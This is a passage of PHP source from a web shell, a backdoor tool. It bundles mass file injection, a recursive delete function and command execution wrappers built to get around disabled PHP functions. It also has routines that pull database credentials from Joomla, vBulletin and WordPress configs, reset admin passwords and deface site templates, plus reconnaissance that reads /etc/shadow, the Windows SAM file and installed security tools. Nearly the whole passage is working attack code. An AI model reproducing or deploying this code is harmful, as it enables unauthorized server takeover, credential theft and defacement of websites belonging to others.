1067 if($file_parts['extension'] == $filetype)
1068 {
1069 if(($dir . '/' . $object) == $curfile)
1070 continue;
1071 $fp=fopen($dir . '/' . $object,$mode);
1072 if (fputs($fp,$lolinject))
1073 {
1074 $mycount++;
1075 echo '<br><font class=txt >'.$dir . '/' . $object.' was injected<br></font>';
1076 }
1077 else
1078 echo '<font >failed to inject '.$dir . '/' . $object.'<BR></font>';
1079 }
1080 }
1081 }
1082 }
1083 }
1084 }
1085 function rrmdir($dir)
1086 {
1087 if (is_dir($dir)) // ensures that we actually have a directory
1088 {
1089 $objects = scandir($dir); // gets all files and folders inside
1090 foreach ($objects as $object)
1091 {
1092 if ($object != '.' && $object != '..')
1093 {
1094 if (is_dir($dir . '/' . $object))
1095 {
1096 // if we find a directory, do a recursive call
1097 rrmdir($dir . '/' . $object);
1098 }
1099 else
1100 {
1101 // if we find a file, simply delete it
1102 unlink($dir . '/' . $object);
1103 }
1104 }
1105 }
1106 // the original directory is now empty, so delete it
1107 rmdir($dir);
1108 }
1109 }
1110
1111 function which($pr)
1112 {
1113 $path = execmd("which $pr");
1114 if(!empty($path))
1115 return trim($path);
1116 else
1117 return trim($pr);
1118 }
1119
1120 function magicboom($text)
1121 {
1122 if (!get_magic_quotes_gpc())
1123 return $text;
1124 return stripslashes($text);
1125 }
1126 function perlshell($command)
1127 {
1128 $perl=new perl();
1129 ob_start();
1130 $perl->eval("system('".$command."')");
1131 $exec=ob_get_contents();
1132 ob_end_clean();
1133 return $exec;
1134}
1135function execmd($cmd,$d_functions="None")
1136{
1137 if($d_functions=="None")
1138 {
1139 $ret=passthru($cmd);
1140 return $ret;
1141 }
1142 $funcs=array("shell_exec","exec","passthru","system","popen","perl_func");
1143 $d_functions=str_replace(" ","",$d_functions);
1144 $dis_funcs=explode(",",$d_functions);
1145 foreach($funcs as $safe)
1146 {
1147 if(!in_array($safe,$dis_funcs))
1148 {
1149 if($safe=="exec")
1150 {
1151 $ret=@exec($cmd);
1152 $ret=join("\n",$ret);
1153 return $ret;
1154 }
1155 elseif($safe=="system")
1156 {
1157 $ret=@system($cmd);
1158 return $ret;
1159 }
1160 elseif($safe=="passthru")
1161 {
1162 $ret=@passthru($cmd);
1163 return $ret;
1164 }
1165 elseif($safe=="shell_exec")
1166 {
1167 $ret=@shell_exec($cmd);
1168 return $ret;
1169 }
1170 elseif($safe=="popen")
1171 {
1172 $ret=@popen("$cmd",'r');
1173 if(is_resource($ret))
1174 {
1175 while(@!feof($ret))
1176 $read.=@fgets($ret);
1177 @pclose($ret);
1178 return $read;
1179 }
1180 return -1;
1181 }
1182 elseif($safe="proc_open")
1183 {
1184 $cmdpipe=array(
1185 0=>array('pipe','r'),
1186 1=>array('pipe','w')
1187 );
1188 $resource=@proc_open($cmd,$cmdpipe,$pipes);
1189 if(@is_resource($resource))
1190 {
1191 while(@!feof($pipes[1]))
1192 $ret.=@fgets($pipes[1]);
1193 @fclose($pipes[1]);
1194 @proc_close($resource);
1195 return $ret;
1196 }
1197 return -1;
1198 }
1199 elseif($safe=="perl_func")
1200 {
1201 $ret=perlshell($command);
1202 return $ret;
1203 }
1204 }
1205 }
1206 return -1;
1207}
1208 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
1209 {
1210 $ar0=explode($marqueurDebutLien, $text);
1211 $ar1=explode($marqueurFinLien, $ar0[$i]);
1212 return trim($ar1[0]);
1213 }
1214 function changeindexjo($conf,$h,$site)
1215 {
1216 global $defcount;
1217 $dol = '$';
1218 $sitename = entre2v2($conf,$dol."sitename = '","';");
1219 $username = entre2v2($conf,$dol."user = '","';");
1220 $password = entre2v2($conf,$dol."password = '","';");
1221 $dbname = entre2v2($conf,$dol."db = '","';");
1222 $prefix = entre2v2($conf,$dol."dbprefix = '","';");
1223 $localhost = entre2v2($conf,$dol."host = '","';");
1224
1225 $co=randomt();
1226
1227 $link=mysql_connect($localhost,$username,$password) ;
1228 mysql_select_db($dbname,$link);
1229
1230 $tryChaningInfo = mysql_query("UPDATE ".$prefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
1231
1232 $req =mysql_query("SELECT * from `".$prefix."extensions` ");
1233
1234 if ( $req )
1235 {
1236 $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
1237 $data = mysql_fetch_array($req);
1238 $template_name=$data["template"];
1239
1240 $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
1241 $data = mysql_fetch_array($req);
1242 $template_id=$data["extension_id"];
1243
1244 $url2 = $site_url =$site."/administrator/index.php";
1245
1246 $ch = curl_init();
1247 curl_setopt($ch, CURLOPT_URL, $url2);
1248 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1249 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1250 curl_setopt($ch, CURLOPT_HEADER, 1);
1251 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1252 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1253 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1254
1255 $buffer = curl_exec($ch);
1256
1257 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
1258 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
1259
1260 $url2=$site_url."/index.php";
1261 $ch = curl_init();
1262 curl_setopt($ch, CURLOPT_URL, $url2);
1263 curl_setopt($ch, CURLOPT_POST, 1);
1264 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
1265 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1266 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1267 curl_setopt($ch, CURLOPT_HEADER, 0);
1268 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1269 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1270 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1271 $buffer = curl_exec($ch);
1272 echo "<tr align =center>";
1273 echo '<td>admin : 123456789</td>';
1274 $pos = strpos($buffer,"com_config");
1275 if($pos === false)
1276 echo("<td>[-] Login Error</td>");
1277 else
1278 echo("<td><font class=txt>[+] Login Success</font></td>");
1279
1280 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
1281 $ch = curl_init();
1282 curl_setopt($ch, CURLOPT_URL, $url2);
1283 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1284 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1285 curl_setopt($ch, CURLOPT_HEADER, 0);
1286 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1287 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1288 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1289 $buffer = curl_exec($ch);
1290
1291 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
1292
1293 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1294
1295 $ch = curl_init();
1296 curl_setopt($ch, CURLOPT_URL, $url2);
1297 curl_setopt($ch, CURLOPT_POST, 1);
1298 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
1299
1300 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1301 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1302 curl_setopt($ch, CURLOPT_HEADER, 0);
1303 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1304 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1305 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1306 $buffer = curl_exec($ch);
1307
1308 $pos = strpos($buffer,'<dd class="message message">');
1309 if($pos === false)
1310 {
1311 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Defaced</td>");
1312 }
1313 else
1314 {
1315 $defcount++;
1316 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1317 }
1318 }
1319 else
1320 {
1321 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
1322 $data = mysql_fetch_array($req);
1323 $template_name=$data["template"];
1324
1325 $url2=$site_url."/index.php";
1326 $ch = curl_init();
1327 curl_setopt($ch, CURLOPT_URL, $url2);
1328 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1329 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1330 curl_setopt($ch, CURLOPT_HEADER, 1);
1331 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1332 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1333 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1334 $buffer = curl_exec($ch);
1335
1336 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
1337
1338 $url2=$site_url."/index.php";
1339 $ch = curl_init();
1340 curl_setopt($ch, CURLOPT_URL, $url2);
1341 curl_setopt($ch, CURLOPT_POST, 1);
1342 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
1343 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1344 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1345 curl_setopt($ch, CURLOPT_HEADER, 0);
1346 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1347 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1348 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1349 $buffer = curl_exec($ch);
1350
1351 $pos = strpos($buffer,"com_config");
1352 echo "<tr align =center>";
1353 echo '<td>admin : 123456789</td>';
1354 if($pos === false)
1355 echo("<td>[-] Login Error</td>");
1356 else
1357 echo("<td><font class=txt>[+] Login Success</font></td>");
1358
1359 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
1360 $ch = curl_init();
1361 curl_setopt($ch, CURLOPT_URL, $url2);
1362 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1363 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1364 curl_setopt($ch, CURLOPT_HEADER, 0);
1365 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1366 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1367 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1368 $buffer = curl_exec($ch);
1369
1370 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
1371
1372 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1373 $ch = curl_init();
1374 curl_setopt($ch, CURLOPT_URL, $url2);
1375 curl_setopt($ch, CURLOPT_POST, 1);
1376 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
1377 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1378 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1379 curl_setopt($ch, CURLOPT_HEADER, 0);
1380 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1381 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1382 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1383 $buffer = curl_exec($ch);
1384
1385 $pos = strpos($buffer,'<dd class="message message fade">');
1386 if($pos === false)
1387 {
1388 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Deface</td>");
1389 }
1390 else
1391 {
1392 $defcount++;
1393 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1394 }
1395 }
1396 echo "</tr>";
1397 }
1398 function changeindexvb($conf,$index)
1399 {
1400 $dol = '$';
1401
1402 $username = entre2v2($conf,"['MasterServer']['username'] = '","';");
1403 $password = entre2v2($conf,"['MasterServer']['password'] = '","';");
1404 $dbname = entre2v2($conf,"se']['dbname'] = '","';");
1405 $prefix = entre2v2($conf,"['Database']['tableprefix'] = '","';");
1406 $localhost = entre2v2($conf,"['MasterServer']['servername'] = '","';");
1407
1408 $con =@ mysql_connect($localhost,$username,$password);
1409 $db =@ mysql_select_db($dbname,$con);
1410 $ss = mysql_query("SELECT * from `".$prefix."setting` WHERE varname='bburl'");
1411 $data = mysql_fetch_array($ss);
1412
1413 echo "<tr align=center>";
1414 $index=str_replace('"','\\"',$index);
1415 $attack = "{\${eval(base64_decode(\'";
1416 $attack .= base64_encode("echo \"$index\";");
1417 $attack .= "\'))}}{\${exit()}}</textarea>";
1418 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1419 $result =@ mysql_query($query,$con);
1420 if($result)
1421 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><font class=txt><blink>Vbulletin Forum Defaced Successfully</blink></font></td>";
1422 else
1423 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><blink>Cannot Deface Vbulletin Forum</blink></td>";
1424 echo "<tr>";
1425 }
1426 function changeindexwp($conf,$index)
1427 {
1428 $index = urlencode($index);
1429 $dol = '$';
1430 $username = entre2v2($conf,"define('DB_USER', '","');");
1431 $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
1432 $dbname = entre2v2($conf,"define('DB_NAME', '","');");
1433 $prefix = entre2v2($conf,$dol."table_prefix = '","'");
1434 $host = entre2v2($conf,"define('DB_HOST', '","');");
1435 $con =@ mysql_connect($host,$username,$password);
1436 $db =@ mysql_select_db($dbname,$con);
1437 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
1438
1439 if($req1)
1440 {
1441 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1442 $data = mysql_fetch_array($req);
1443 $site_url=$data["option_value"];
1444
1445 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
1446 $data = mysql_fetch_array($req);
1447 $template = $data["option_value"];
1448
1449 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
1450 $data = mysql_fetch_array($req);
1451 $current_theme = $data["option_value"];
1452
1453 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
1454 $url2=$site_url."/wp-login.php";
1455
1456 $ch = curl_init();
1457 curl_setopt($ch, CURLOPT_URL, $url2);
1458 curl_setopt($ch, CURLOPT_POST, 1);
1459 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
1460 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1461 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1462 curl_setopt($ch, CURLOPT_HEADER, 0);
1463 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
1464 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1465 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1466 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1467 $buffer = curl_exec($ch);
1468
1469 $pos = strpos($buffer,"action=logout");
1470
1471 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
1472 curl_setopt($ch, CURLOPT_URL, $url2);
1473 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
1474 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1475 curl_setopt($ch, CURLOPT_HEADER, 0);
1476 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1477 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1478 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1479 $buffer0 = curl_exec($ch);
1480
1481 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
1482 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
1483
1484 if(substr_count($_file,"index.php") != 0)
1485 $output .= "<tr align =center>";
1486 $url2=$site_url."/wp-admin/theme-editor.php";
1487 curl_setopt($ch, CURLOPT_URL, $url2);
1488 curl_setopt($ch, CURLOPT_POST, 1);
1489 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
1490 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1491 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1492 curl_setopt($ch, CURLOPT_HEADER, 0);
1493 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1494 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1495 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1496 $buffer = curl_exec($ch);
1497 curl_close($ch);
1498 $pos = strpos($buffer,'<div id="message" class="updated">');
1499 $cond = 0;
1500 if($pos === false)
1501 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td>Cannot Deface</td>";
1502 else
1503 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td><font class=txt>Wordpress Defaced Successfully</font></td>";
1504 }
1505 else
1506 $output.= "<td colspan=2> DB Error</td>";
1507 echo $output."</tr>";
1508 global $base_path;
1509 unlink($base_path.'COOKIE.txt');
1510 }
1511 function getDisabledFunctions()
1512 {
1513 if(!ini_get('disable_functions'))
1514 {
1515 return "None";
1516 }
1517 else
1518 {
1519 return @ini_get('disable_functions');
1520 }
1521 }
1522 function getFilePermissions($file)
1523 {
1524 $perms = fileperms($file);
1525
1526 if (($perms & 0xC000) == 0xC000) {
1527 // Socket
1528 $info = 's';
1529 } elseif (($perms & 0xA000) == 0xA000) {
1530 // Symbolic Link
1531 $info = 'l';
1532 } elseif (($perms & 0x8000) == 0x8000) {
1533 // Regular
1534 $info = '-';
1535 } elseif (($perms & 0x6000) == 0x6000) {
1536 // Block special
1537 $info = 'b';
1538 } elseif (($perms & 0x4000) == 0x4000) {
1539 // Directory
1540 $info = 'd';
1541 } elseif (($perms & 0x2000) == 0x2000) {
1542 // Character special
1543 $info = 'c';
1544 } elseif (($perms & 0x1000) == 0x1000) {
1545 // FIFO pipe
1546 $info = 'p';
1547 } else {
1548 // Unknown
1549 $info = 'u';
1550 }
1551
1552 // Owner
1553 $info .= (($perms & 0x0100) ? 'r' : '-');
1554 $info .= (($perms & 0x0080) ? 'w' : '-');
1555 $info .= (($perms & 0x0040) ?
1556 (($perms & 0x0800) ? 's' : 'x' ) :
1557 (($perms & 0x0800) ? 'S' : '-'));
1558
1559 // Group
1560 $info .= (($perms & 0x0020) ? 'r' : '-');
1561 $info .= (($perms & 0x0010) ? 'w' : '-');
1562 $info .= (($perms & 0x0008) ?
1563 (($perms & 0x0400) ? 's' : 'x' ) :
1564 (($perms & 0x0400) ? 'S' : '-'));
1565
1566 // World
1567 $info .= (($perms & 0x0004) ? 'r' : '-');
1568 $info .= (($perms & 0x0002) ? 'w' : '-');
1569 $info .= (($perms & 0x0001) ?
1570 (($perms & 0x0200) ? 't' : 'x' ) :
1571 (($perms & 0x0200) ? 'T' : '-'));
1572
1573 return $info;
1574}
1575 function filepermscolor($filename)
1576 {
1577 if(!@is_readable($filename))
1578 return "<font class=readperm>".getFilePermissions($filename)."</font>";
1579 else if(!@is_writable($filename))
1580 return "<font class=noperm>".getFilePermissions($filename)."</font>";
1581 else
1582 return "<font class=wrtperm>".getFilePermissions($filename)."</font>";
1583 }
1584
1585 function yourip()
1586 {
1587 echo $_SERVER["REMOTE_ADDR"];
1588 }
1589 function phpver()
1590 {
1591 $pv=@phpversion();
1592 echo $pv;
1593 }
1594 function magic_quote()
1595 {
1596 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"OFF";
1597 }
1598 function serverip()
1599 {
1600 echo @gethostbyname($_SERVER["HTTP_HOST"]);
1601 }
1602 function serverport()
1603 {
1604 echo $_SERVER['SERVER_PORT'];
1605 }
1606 function safe()
1607 {
1608 global $sm;
1609 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
1610 }
1611 function serveradmin()
1612 {
1613 echo $_SERVER['SERVER_ADMIN'];
1614 }
1615 function systeminfo()
1616 {
1617 echo php_uname();
1618 }
1619 function curlinfo()
1620 {
1621 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("Disabled");
1622 }
1623 function oracleinfo()
1624 {
1625 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("Disabled");
1626 }
1627 function mysqlinfo()
1628 {
1629 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1630 }
1631 function mssqlinfo()
1632 {
1633 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1634 }
1635 function postgresqlinfo()
1636 {
1637 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1638 }
1639 function softwareinfo()
1640 {
1641 echo getenv("SERVER_SOFTWARE");
1642 }
1643 function download()
1644 {
1645 $frd=$_GET['download'];
1646 $prd=explode("/",$frd);
1647 for($i=0;$i<sizeof($prd);$i++)
1648 {
1649 $nfd=$prd[$i];
1650 }
1651 @ob_clean();
1652 header("Content-type: application/octet-stream");
1653 header("Content-length: ".filesize($nfd));
1654 header("Content-disposition: attachment; filename=\"".$nfd."\";");
1655 readfile($nfd);
1656
1657 exit;
1658
1659 }
1660
1661 function HumanReadableFilesize($size)
1662 {
1663 $mod = 1024;
1664 $units = explode(' ','B KB MB GB TB PB');
1665 for ($i = 0; $size > $mod; $i++)
1666 {
1667 $size /= $mod;
1668 }
1669 return round($size, 2) . ' ' . $units[$i];
1670 }
1671
1672 function showDrives()
1673 {
1674 global $self;
1675 foreach(range('A','Z') as $drive)
1676 {
1677 if(is_dir($drive.':\\'))
1678 {
1679 $myd = $drive.":\\";
1680 ?>
1681 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
1682 <?php echo $myd; ?>
1683 </a>
1684 <?php
1685 }
1686 }
1687 }
1688 function diskSpace()
1689 {
1690 global $dir;
1691 return disk_total_space($dir);
1692 }
1693 function freeSpace()
1694 {
1695 global $dir;
1696 return disk_free_space($dir);
1697 }
1698
1699 function thiscmd($p)
1700 {
1701 $path = myexe('which ' . $p);
1702 if(!empty($path))
1703 return $path;
1704 return false;
1705 }
1706
1707 function mysecinfo()
1708 {
1709 function myparam($n, $v)
1710 {
1711 $v = trim($v);
1712 if($v)
1713 {
1714 echo '<span><font size=3>' . $n . ': </font></span>';
1715 if(strpos($v, "\n") === false)
1716 echo '<font class=txt size=3>' . $v . '</font><br>';
1717 else
1718 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1719 }
1720 }
1721
1722 myparam('Server software', @getenv('SERVER_SOFTWARE'));
1723 if(function_exists('apache_get_modules'))
1724 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
1725 myparam('Open base dir', @ini_get('open_basedir'));
1726 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1727 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1728 $temp=array();
1729 if(function_exists('mysql_get_client_info'))
1730 $temp[] = "MySql (".mysql_get_client_info().")";
1731 if(function_exists('mssql_connect'))
1732 $temp[] = "MSSQL";
1733 if(function_exists('pg_connect'))
1734 $temp[] = "PostgreSQL";
1735 if(function_exists('oci_connect'))
1736 $temp[] = "Oracle";
1737 myparam('Supported databases', implode(', ', $temp));
1738 echo '<br>';
1739
1740 if($GLOBALS['os'] == 'Linux') {
1741 myparam('Distro : ', myexe("cat /etc/*-release"));
1742 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
1743 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
1744 myparam('OS version', @file_get_contents('/proc/version'));
1745 myparam('Distro name', @file_get_contents('/etc/issue.net'));
1746 myparam('Where is Perl?', myexe('whereis perl'));
1747 myparam('Where is Python?', myexe('whereis python'));
1748 myparam('Where is gcc?', myexe('whereis gcc'));
1749 myparam('Where is apache?', myexe('whereis apache'));
1750 myparam('CPU?', myexe('cat /proc/cpuinfo'));
1751 myparam('RAM', myexe('free -m'));
1752 myparam('Mount options', myexe('cat /etc/fstab'));
1753 myparam('User Limits', myexe('ulimit -a'));
1754
1755
1756 if(!$GLOBALS['safe_mode']) {
1757 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1758 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1759 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1760 echo '<br>';
1761 $temp=array();
1762 foreach ($userful as $item)
1763 if(thiscmd($item))
1764 $temp[] = $item;
1765 myparam('Userful', implode(', ',$temp));
1766 $temp=array();
1767 foreach ($danger as $item)
1768 if(thiscmd($item))
1769 $temp[] = $item;
1770 myparam('Danger', implode(', ',$temp));
1771 $temp=array();
1772 foreach ($downloaders as $item)
1773 if(thiscmd($item))
1774 $temp[] = $item;
1775 myparam('Downloaders', implode(', ',$temp));
1776 echo '<br/>';
1777 myparam('HDD space', myexe('df -h'));
1778 myparam('Hosts', @file_get_contents('/etc/hosts'));
1779
1780 }
1781 } else {
1782 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
1783 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
1784 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
1785 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
1786 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
1787 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
1788 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
1789 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
1790 myparam('OS Version',myexe('ver'));
1791 myparam('Account Settings',myexe('net accounts'));
1792 myparam('User Accounts',myexe('net user'));
1793 }
1794 echo '</div>';
1795 }
1796
1797
1798
1799 function myexe($in)
1800 {
1801 $out = '';
1802 if (function_exists('exec')) {
1803 @exec($in,$out);
1804 $out = @join("\n",$out);
1805 } elseif (function_exists('passthru')) {
1806 ob_start();
1807 @passthru($in);
1808 $out = ob_get_clean();
1809 } elseif (function_exists('system')) {
1810 ob_start();
1811 @system($in);
1812 $out = ob_get_clean();
1813 } elseif (function_exists('shell_exec')) {
1814 $out = shell_exec($in);
1815 } elseif (is_resource($f = @popen($in,"r"))) {
1816 $out = "";
1817 while(!@feof($f))
1818 $out .= fread($f,1024);
1819 pclose($f);
1820 }
1821 return $out;
1822}
1823function exec_all($command)
1824 {
1825
1826 $output = '';
1827 if(function_exists('exec'))
1828 {
1829 exec($command,$output);
1830 $output = join("\n",$output);
1831 }
1832
1833 else if(function_exists('shell_exec'))
1834 {
1835 $output = shell_exec($command);
1836 }
1837
1838 else if(function_exists('popen'))
1839 {
1840 $handle = popen($command , "r"); // Open the command pipe for reading
1841 if(is_resource($handle))
1842 {
1843 if(function_exists('fread') && function_exists('feof'))
1844 {
1845 while(!feof($handle))
1846 {
1847 $output .= fread($handle, 512);
1848 }
1849 }
1850 else if(function_exists('fgets') && function_exists('feof'))
1851 {
1852 while(!feof($handle))
1853 {
1854 $output .= fgets($handle,512);
1855 }
1856
1857
1858
1859 }
1860 }
1861 pclose($handle);
1862 }
1863
1864
1865 else if(function_exists('system'))
1866 {
1867 ob_start(); //start output buffering
1868 system($command);
1869 $output = ob_get_contents(); // Get the ouput
1870 ob_end_clean(); // Stop output buffering
1871 }
1872
1873 else if(function_exists('passthru'))
1874 {
1875 ob_start(); //start output buffering
1876 passthru($command);
1877 $output = ob_get_contents(); // Get the ouput
1878 ob_end_clean(); // Stop output buffering
1879 }
1880
1881 else if(function_exists('proc_open'))
1882 {
1883 $descriptorspec = array(
1884 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
1885 );
1886 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1887 if(is_resource($handle))
1888 {
1889 if(function_exists('fread') && function_exists('feof'))
1890 {
1891 while(!feof($pipes[1]))
1892 {
1893 $output .= fread($pipes[1], 512);
1894 }
1895 }
1896 else if(function_exists('fgets') && function_exists('feof'))
1897 {
1898 while(!feof($pipes[1]))
1899 {
1900 $output .= fgets($pipes[1],512);
1901 }
1902 }
1903 }
1904 pclose($handle);
1905 }
1906
1907 return(htmlspecialchars($output));
1908
1909}
1910
1911$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"OFF";
